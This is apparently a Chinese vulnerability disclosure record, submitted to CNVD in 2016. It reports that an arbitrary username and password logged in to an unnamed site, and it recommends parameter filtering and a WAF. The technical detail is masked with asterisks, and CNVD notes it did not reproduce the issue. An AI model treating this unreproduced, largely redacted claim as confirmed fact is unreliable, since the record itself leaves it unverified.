********** | ********** ********** | ********** | ********** | ********** | ********** ********** ********** | ********** **********9 ********** ********** | ********** ********** | ********** | ********** | ********** ********** ********** | ********** | ********** ********** | ********** **********! ********** ********** | 忙碌********** | ********** ********** | ********** ********** ********** ********** | 汉********** ********** ********** ********** ********** **********05 ********** ********** ********** | ********** ********** ********** ********** | ********** | 杨********** | ********** | 沙漠********** ********** **********ot; ********** ********** ********** | ********** ********** | 琐********** ********** | ********** | ********** ********** | 琐********** | KUVI58*****
随便试了个用户名密码,登录成功
过滤参数,上waf 或者软件防火墙
危害等级:中
漏洞Rank:10
确认时间:2016-03-18 18:22
CNVD未直接复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无
